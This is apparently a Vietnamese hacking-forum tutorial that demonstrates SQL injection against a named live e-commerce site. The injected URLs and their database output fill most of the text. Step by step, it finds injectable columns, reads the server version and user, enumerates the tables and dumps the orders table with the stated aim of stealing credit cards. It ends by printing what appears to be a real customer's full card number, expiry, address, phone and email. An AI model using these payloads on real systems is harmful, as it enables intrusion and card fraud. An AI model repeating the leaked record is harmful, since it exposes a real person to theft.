TUT hack shop php mysql injection 5.0

victim: https://www.185elgin.com/customer_te...timonial_id=25'

Quote:

1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 select * FROM customer_testimonials WHERE testimonials_id = 25\'

de nhan biet loi nay co hack dc nua ko ta querry them 1 chut nay de nhan biet dc 

https://www.185elgin.com/customer_te...timonial_id=25 and 1=1/*

bat ra 1 page voi gia tri true = 1 

https://www.185elgin.com/customer_te...timonial_id=25 and 1=0/*

bat ra 1 page voi gia tri false = 0

anh em du dk tren thi tien hanh hack site nha'


bay gio ta di tim site nay co bao nhieu colum de khai thac ra loi 




https://www.185elgin.com/customer_te...,3,4,5,6,7,8--

Querry từ 1-8 nhảy ra lỗi này 

Quote:

nhay ra loi 3&6 ta lay o vi tri so 3 nhe 3 6

Đinh vị lấy số 3 làm tâm điểm như dưới nha !

bay gio ta tim xem phien ban mysql cua site nay la bao nhieu de tuy bien khai thac nhe

ta nen dung ham concat_ws(0x3a,version(),user(),database() de tim nhe

https://www.185elgin.com/customer_te...)),4,5,6,7,8--

nhu vay la ver mysql 5.0.xx

Quote:

5.0.51a-community:sendmc2_script@localhost:sendmc2_185elgi n

den day ta co the khai thac theo kieu inject mysql 5.0 roai 


ta di tim table dau tien cua site nhe

https://www.185elgin.com/customer_te...0limit%201,1--

Quote:

ra tiep table dau tien la: COLLATIONS

Meo nho cho cac tester luoi querry ra tung table mot ta lam nhu sau 


https://www.185elgin.com/customer_te...chema.tables--

Quote:

CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_ APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN _USAGE,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEG ES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVI LEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,address_book, address_format,banners,banners_history,card_surcha rges,categories,categories_description,configurati on,configuration_group,counter,counter_history,cou ntries,currencies,customer_testimonials,customers, customers_basket,customers_basket_attributes,custo mers_info,geo_zones,languages,link_categories,link _categories_description,links,links_check,links_de scription,links_featured,links_status,links_to_lin k_categories,manufacturers,manufacturers_info,news letters,orders,orders_maxmind,orders_products,orde rs_products_attributes,orders_products_download,or ders_status,orders_status_history,orders_total,pro ducts,products_attributes,products_attributes_down load,products_description,products_notifications,p roducts_options,products_options_values,products_o ptions_values_to_product

do the la ta da co table dau tien va cac cac tables cua site roi.

bay gio ta tien hanh tim table nao co chua cc nha :d

ta tien hanh querry lay tat ca cc tu table orders xem nhe'

truoc tien phai convert sang dang hex nhe

ta vao day http://www.vortex.prodigynet.co.uk/misc/ascii_conv.html
convert orders ra cai nay 0x6F7264657273

https://www.185elgin.com/customer_te...0x6F7264657273

Quote:

orders_id 6 Click here to view all testimonials Testimonial by 4 customers_id 6 Click here to view all testimonials Testimonial by 4 customers_name 6 Click here to view all testimonials ...........................................

Xong roi day ta lay nhung info can thiet de get cc nao

https://www.185elgin.com/customer_te...+from+orders--

Quote:

8/American Express/Alexander Cassini/371382972132008/1207/2523 3rd street//Santa Monica/90405/California/United States/310-560-1803/acassini@aol.com/2005-10-20 12:27:23

Posted in: Hacking,Tutorial,UG